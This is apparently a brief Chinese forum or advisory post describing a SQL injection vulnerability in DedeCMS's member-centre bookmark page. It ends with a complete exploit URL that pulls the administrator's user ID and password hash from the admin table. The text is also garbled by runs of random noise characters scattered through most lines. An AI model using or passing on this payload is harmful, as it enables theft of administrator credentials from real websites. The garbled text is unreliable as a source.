DedeCMS会员中心SQL注射漏洞$ m9 ^2 n. N; l' ]# a8 c
需要magic_quotes_gpc = Off
& i+ k" ^8 y. ]; C( Y会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.! C& d" Y* X1 \
9 R1 Z0 d. {3 \# {& m/ S; }/ lDedeCMS会员中心书签管理SQL注射漏洞8 H2 h' E. H& i
成功利用该漏洞可获得管理员密码
: i$ [' d0 Q) F5 ? 7 E: g$ N8 |1 J) Z8 _% n; `6 ]
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码
+ s& u' \2 n; N" w % R O; n z- y/ c3 a4 m
http://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r" @. e, Z1 n6 q+ r& L
|